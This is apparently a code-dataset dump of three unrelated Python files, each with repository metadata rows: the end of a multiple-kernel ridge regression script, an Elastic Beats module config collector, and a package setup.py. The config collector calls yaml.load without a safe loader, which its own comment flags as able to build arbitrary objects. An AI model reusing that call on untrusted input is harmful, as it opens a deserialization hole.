        raise NotImplementedError("")
#        tp = p[:]
#        tk = kij[:][:].copy()
#        vp = np.var(tp) # variance of the property subset (to be size consistent!)
#        vk = np.trace(tk)/len(tp)
#        print >> sys.stderr, "Regularization shift ", sigma**2 * vk/vp
#        #print lweight
#        for i in xrange(len(tp)):
#            tk[i,i]+=sigma**2 * vk/vp #/ lweight[i] # diagonal regularization times weight!
#        tc = np.linalg.solve(tk, tp)
#        krp = np.dot(kij[:,:],tc)
#        mae=abs(krp[:]-p[:]).sum()/len(p)
#        rms=np.sqrt(((krp[:]-p[:])**2).sum()/len(p))
#        sup=abs(krp[:]-p[:]).max()
#        print "# train-set MAE: %f RMS: %f SUP: %f" % (mae, rms, sup)
#        ltrain = range(nel)
    else:
        np.set_printoptions(threshold=10000)
        ntrain = int(trainfrac*nel)
        if mode == "manual": ntrain=len(mtrain)
        ntrue = int(ttest*nel)
        seeds = np.random.randint(0,5000,ntests)
        # Per-run results, kept so the best run (lowest test MAE) can be saved.
        alphas = []
        mus = []
        testMAEs = []
        ltrains = []
        rlabss = []
        for itest in xrange(ntests):
            ltest = np.zeros(nel-ntrain-ntrue,int)
            ltrain = np.zeros(ntrain,int)
            # if specified, select some elements that are completely ignored from both selection and training
            ltrue = np.zeros(ntrue, int)
            psel = np.ones(nel,float)
            if ntrue > 0:
                ltrue = randomsubset(nel, ntrue)
                psel[ltrue] = 0.0
            if mode == "random":
                ltrain[:] = randomsubset(nel, ntrain, psel)
            elif mode == "manual":
                ltrain[:] = mtrain
            elif mode == "sequential":
                ltrain[:] = range(ntrain)
            elif mode == "fps":
                # do farthest point sampling on the uniform combination of the kernels
                kij = np.zeros((nel,nel),dtype=np.float64)
                for kernel in kernels:
                    kij += kernel
                isel=int(np.random.uniform()*nel)
                while isel in ltrue:
                    isel=int(np.random.uniform()*nel)
                ltrain = farthestPointSampling(kij,nel,ntrain,initalLandmark=isel,listOfDiscardedPoints=ltrue,seed=seeds[itest])
            # Everything not in train or true-test becomes the test set.
            k = 0
            for i in xrange(nel):
                if not i in ltrain and not i in ltrue:
                    ltest[k] = i
                    k += 1
            # # the kernel should represent the variance of the energy (in a GAP interpretation)
            # # and sigma^2 the estimate of the noise variance. However we want to keep a "naked kernel" so
            # # we can then estimate without bringing around the variance. So the problem would be
            # # (vp*N/Tr(tk) tk + sigma^2 I )^-1 p = w
            # # but equivalently we can write
            # # ( tk + sigma^2 *tr(tk)/(N vp) I )^-1 p = w
            # get prop of reference for training and testing
            propTeRef = prop[ltest]
            propTrRef = prop[ltrain]
            # Train your model and get the optimal weights out
            kernelsTr = []
            for it,kernel in enumerate(kernels):
                kernelsTr.append(kernel[np.ix_(ltrain,ltrain)])
            alpha, mu, propTr = mkl.TrainKRRCortes(kernelsTr,propTrRef,**KRRCortesParam)
            # Predict property using the optimal weights
            kernelsTe = []
            for it,kernel in enumerate(kernels):
                kernelsTe.append(kernel[np.ix_(ltrain,ltest)])
            propTe = mkl.PredictKRRCortes(kernelsTe,alpha,mu)
            mae = cst.mae(propTe-propTeRef)
            rms = cst.rmse(propTe-propTeRef)
            sup = cst.sup_e(propTe-propTeRef)
            print "# run: {} test-set MAE: {:.4e} RMS: {:.4e} SUP: {:.4e}".format(itest, mae, rms, sup)
            # accumulate output to select the weigths corresponding to the lowest MAE
            alphas.append(alpha)
            mus.append(mu)
            testMAEs.append(mae)
            ltrains.append(ltrain)
            rlabss.append(rlabs)
            testmae += cst.mae(propTe-propTeRef)
            trainmae += cst.mae(propTr-propTrRef)
            #if ntrue>0: truemae += abs(krp[ltrue]-prop[ltrue]).sum()/len(ltrue)
            testrms += cst.rmse(propTe-propTeRef)
            trainrms += cst.rmse(propTr-propTrRef)
            #if ntrue>0: truerms += np.sqrt(((krp[ltrue]-prop[ltrue])**2).sum()/len(ltrue))
            testsup += cst.sup_e(propTe-propTeRef)
            trainsup += cst.sup_e(propTr-propTrRef)
            #if ntrue>0: truesup+=abs(krp[ltrue]-prop[ltrue]).max()
            ctrain+=len(ltrain)
            ctest+=len(ltest)
            ctrue+=len(ltrue)
#        for it,jt in enumerate(ltrain):
#            print jt, propTrRef[it], propTr[it], "TRAIN"
#        for it,jt in enumerate(ltest):
#            print jt, propTeRef[it], propTe[it], "TEST"
#        print alpha
    # NOTE(review): `mu`, `ltrue` etc. below rely on Python's loop-variable
    # leakage out of the `else:` branch; they are undefined if mode == "all".
    print 'Mu = {}'.format(mu)
    print "# KRR results ({:d} tests, {:f} training p., {:f} test p.): csi={} sigma={:.2e} mu0={} Lambda={:.1f} epsilon={:.1e} eta={:.1e} "\
    .format(ntests, ctrain/ntests, ctest/ntests, csi, KRRCortesParam['sigma'],KRRCortesParam['mu0'],KRRCortesParam['Lambda'],KRRCortesParam['epsilon'],KRRCortesParam['eta'])
    print "# Train points averages: MAE={:.4e} RMSE={:.4e} SUP={:.4e}".format(trainmae/ntests, trainrms/ntests, trainsup/ntests)
    print "# Test points averages: MAE={:.4e} RMSE={:.4e} SUP={:.4e} ".format(testmae/ntests, testrms/ntests, testsup/ntests)
    if len(ltrue) > 0:
        print "# True test points MAE=%f RMSE=%f SUP=%f " % (truemae/ntests, truerms/ntests, truesup/ntests)
    if savevector:
        bestRunIdx = np.argmin(testMAEs)
        falpha = open(savevector+'.alpha','w')
        fmu = open(savevector+'.mu','w')
        kernelFilenamesStr = '';
        for it,kernelFilename in enumerate(kernelFilenames):
            kernelFilenamesStr+=kernelFilename+' '
        # NOTE(review): str(mu0) below reads the *global* mu0 defined in the
        # __main__ block, not a parameter of main(); this raises NameError if
        # main() is imported and called from elsewhere. Consider
        # KRRCortesParam['mu0'] instead.
        commentline=' Train Vector from kernel matrix with the best MAE test score ('+str(np.min(testMAEs))+'): '+ kernelFilenamesStr +', and properties from '+ propFilename + ' selection mode: '+mode+' : Csi, sigma, mu0, Lambda, epsilon, eta = ' + str(csi) +' , '+ str(KRRCortesParam['sigma']) \
        +' , '+ str(mu0)+' , '+ str(KRRCortesParam['Lambda'])+' , '+ str(KRRCortesParam['epsilon'])+' , '+ str(KRRCortesParam['eta'])
        np.savetxt(falpha,np.asarray([alphas[bestRunIdx], ltrains[bestRunIdx], rlabss[bestRunIdx][ltrains[bestRunIdx]]]).T,fmt=("%24.15e", "%10d", "%10d"),header=commentline)
        np.savetxt(fmu,mus[bestRunIdx],fmt=("%24.15e"),header=commentline)
#        commentline=' Train Vector from kernel matrix with the best MAE test score ('+str(testMAEs[-1])+'): '+ kernelFilenamesStr +', and properties from '+ propFilename + ' selection mode: '+mode+' : Csi, sigma, mu0, Lambda, epsilon, eta = ' + str(csi) +' , '+ str(KRRCortesParam['sigma']) \
#        +' , '+ str(mu0)+' , '+ str(KRRCortesParam['Lambda'])+' , '+ str(KRRCortesParam['epsilon'])+' , '+ str(KRRCortesParam['eta'])
#        np.savetxt(falpha,np.asarray([alpha, ltrain, rlabs[ltrain]]).T,fmt=("%24.15e", "%10d", "%10d"),header=commentline)
#        np.savetxt(fmu,mu,fmt=("%24.15e"),header=commentline)
        falpha.close()
        fmu.close()
if __name__ == '__main__':
    # Command-line entry point: parse the options, expand the comma-separated
    # kernel/mu0/csi lists, and delegate to main().
    parser = argparse.ArgumentParser(description="""Computes Multiple Kernel Learning KRR from Cortes and analytics based on a kernel matrix and a property vector.""")
    parser.add_argument("kernels", nargs=1, help="Kernel matrices. List of coma separated file names.")
    parser.add_argument("props", nargs=1, help="Property file name.")
    parser.add_argument("--mode", type=str, default="random", help="Train point selection (e.g. --mode all / sequential / random / fps / cur / manual")
    parser.add_argument("-f", type=float, default='0.5', help="Train fraction")
    parser.add_argument("--truetest", type=float, default='0.0', help="Take these points out from the selection procedure")
    parser.add_argument("--csi", type=str, default='', help="Kernel scaling. list of coma separated positive values (e.g. 1,1,1 )")
    parser.add_argument("--sigma", type=float, default='1e-3', help="KRR regularization. In units of the properties. ")
    parser.add_argument("--epsilon", type=float, default='2e-3', help="KRR-Mkl param. convergence tolerance on alpha weights absolute difference.")
    parser.add_argument("--Lambda", type=float, default='1', help="KRR-Mkl param. Radius of the ball containing the possible weights of the kernel combination, positive value")
    parser.add_argument("--mu0", type=str, default='', help="KRR-Mkl param. Center of the ball containing the possible weights of the kernel combination, list of coma separated positive values (e.g. 1,1,1 )")
    parser.add_argument("--maxIter", type=float, default='1e2', help="KRR-Mkl param. Maximal number of iteration. ")
    parser.add_argument("--eta", type=float, default='0.5', help="KRR-Mkl param. Interpolation parameter for the update of alpha, belongs to ]0,1[. ")
    parser.add_argument("--ntests", type=int, default='1', help="Number of tests")
    parser.add_argument("--refindex", type=str, default="", help="Structure indices of the kernel matrix (useful when dealing with a subset of a larger structures file)")
    parser.add_argument("--saveweights", type=str, default="", help="Save the train-set weights vector in file")
    args = parser.parse_args()
    kernelFilenames = args.kernels[0].split(',')
    # One mu0 entry is required per kernel file.
    a = args.mu0.split(',')
    if len(a) != len(kernelFilenames):
        raise ValueError("The number of kernel file names and elements of mu0 must be equal.")
    mu0 = np.zeros(len(a),dtype=np.float64)
    for it,item in enumerate(a):
        mu0[it] = float(item)
    # One csi entry is required per kernel file as well.
    a = args.csi.split(',')
    if len(a) != len(kernelFilenames):
        raise ValueError("The number of kernel file names and elements of csi must be equal.")
    csi = np.zeros(len(a),dtype=np.float64)
    for it,item in enumerate(a):
        csi[it] = float(item)
    KRRCortesParam = {'mu0':mu0,'epsilon':args.epsilon,'Lambda':args.Lambda,'eta':args.eta,
                      'maxIter':args.maxIter,'sigma':args.sigma}
    main(kernelFilenames=kernelFilenames, propFilename=args.props[0], mode=args.mode,
         trainfrac=args.f, csi=csi, ntests=args.ntests, refindex=args.refindex,
         ttest=args.truetest,savevector=args.saveweights, **KRRCortesParam)
| 49.88 | 296 | 0.594007 |
9980b4d38a3ae528fc3bf8e52c015fd5e81cec7d | 2,661 | py | Python | vendor/github.com/elastic/beats/metricbeat/scripts/config_collector.py | PPACI/krakenbeat | e75ec8f006164acb8a57d0c9609bebe534955813 | [
"Apache-2.0"
] | 3 | 2018-01-04T19:15:26.000Z | 2020-02-20T03:35:27.000Z | vendor/github.com/elastic/beats/metricbeat/scripts/config_collector.py | PPACI/krakenbeat | e75ec8f006164acb8a57d0c9609bebe534955813 | [
"Apache-2.0"
] | null | null | null | vendor/github.com/elastic/beats/metricbeat/scripts/config_collector.py | PPACI/krakenbeat | e75ec8f006164acb8a57d0c9609bebe534955813 | [
"Apache-2.0"
] | 1 | 2020-10-11T14:57:48.000Z | 2020-10-11T14:57:48.000Z | import os
import argparse
import yaml
# Collects config for all modules
def collect(beat_name, beat_path, full=False):
    """Print the concatenated modules configuration for a beat.

    Walks ``<beat_path>/module/*/_meta``, reads each module's config.yml
    (or config.full.yml when *full* is True and it exists), and prints one
    combined YAML snippet with the "system" module always listed first.

    :param beat_name: name of the beat, used as the YAML key prefix.
    :param beat_path: root folder of the beat.
    :param full: when True, prefer the full config variant and include
        modules that disabled the short config in fields.yml.
    """
    base_dir = beat_path + "/module"
    path = os.path.abspath(base_dir)
    # yml file
    config_yml = "\n#========================== Modules configuration ============================\n"
    config_yml += beat_name + """.modules:
"""
    # Read the modules list but put "system" first
    modules = ["system"]
    for module in sorted(os.listdir(base_dir)):
        if module != "system":
            modules.append(module)
    # Iterate over all modules
    for module in modules:
        # Renamed from ``beat_path`` so the function parameter is not shadowed.
        meta_path = path + "/" + module + "/_meta"
        module_configs = meta_path + "/config.yml"
        # By default, short config is read if short is set
        short_config = True
        # Check if full config exists
        if full:
            full_module_config = meta_path + "/config.full.yml"
            if os.path.isfile(full_module_config):
                module_configs = full_module_config
        # Only check folders where config exists
        if not os.path.isfile(module_configs):
            continue
        # Load title from fields.yml
        with open(meta_path + "/fields.yml") as f:
            # HACK: yaml.load without an explicit Loader can construct
            # arbitrary objects with older PyYAML; these files are
            # repo-local, but prefer yaml.safe_load for untrusted input.
            fields = yaml.load(f.read())
        title = fields[0]["title"]
        # Check if short config was disabled in fields.yml
        if not full and "short_config" in fields[0]:
            short_config = fields[0]["short_config"]
        if not full and short_config is False:
            continue
        config_yml += get_title_line(title)
        # Load module yaml. Fixed to open(): the Python 2-only ``file``
        # builtin broke under Python 3 and was inconsistent with the
        # open() call above.
        with open(module_configs) as f:
            for line in f:
                config_yml += line
        config_yml += "\n"
    # output string so it can be concatenated
    print(config_yml)
# Makes sure every title line is 79 + newline chars long
def get_title_line(title):
    """Return a 79-character banner line "#--- <Title> Module ---\\n".

    The dash padding centres the title; the text is truncated to 78
    characters before the trailing newline so the line length stays
    constant regardless of title length.
    """
    # Floor division: "-" * dashes needs an int. Plain "/" returns a float
    # under Python 3 and would raise a TypeError here; "//" behaves
    # identically on Python 2 for these non-negative ints.
    dashes = (79 - 10 - len(title)) // 2
    line = "#"
    line += "-" * dashes
    line += " " + title + " Module "
    line += "-" * dashes
    return line[0:78] + "\n"
if __name__ == "__main__":
    # Command-line entry point: parse the arguments and run the collector.
    arg_parser = argparse.ArgumentParser(
        description="Collects modules config")
    arg_parser.add_argument("path", help="Path to the beat folder")
    arg_parser.add_argument("--beat", help="Beat name")
    arg_parser.add_argument("--full", action="store_true",
                            help="Collect the full versions")
    cli = arg_parser.parse_args()
    collect(cli.beat, cli.path, cli.full)
| 28.010526 | 103 | 0.565201 |
e1308e34f20c16ef49a124a89d7c6e894d69501e | 803 | py | Python | setup.py | zekearneodo/ceciestunepipe | 7e771783769816f37de44077177152175aecc2b7 | [
"MIT"
] | null | null | null | setup.py | zekearneodo/ceciestunepipe | 7e771783769816f37de44077177152175aecc2b7 | [
"MIT"
] | null | null | null | setup.py | zekearneodo/ceciestunepipe | 7e771783769816f37de44077177152175aecc2b7 | [
"MIT"
] | null | null | null | from setuptools import setup
# Package metadata and install configuration for the ceciestunepipe
# spike-sorting pipeline.
setup(name='ceciestunepipe',
      version='0.1',
      description='Spike sorting pipeline based on spikeinterface for spikeglx and openephys',
      url='http://github.com/zekearneodo/ceciestunepipe',
      author='Zeke Arneodo',
      author_email='ezequiel@ini.ethz.ch',
      license='MIT',
      packages=['ceciestunepipe'],
      # Runtime dependencies; only pandas (>=0.23) and peakutils (>=1.3)
      # carry version constraints.
      install_requires=['numpy',
                        'matplotlib',
                        'pandas>=0.23',
                        'more_itertools',
                        'peakutils>=1.3',
                        'librosa',
                        'seaborn',
                        'scipy',
                        'tqdm',
                        'h5py',
                        'parse'
                        ],
      # Not zip-safe: installed as a regular directory, not a zipped egg.
      zip_safe=False)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.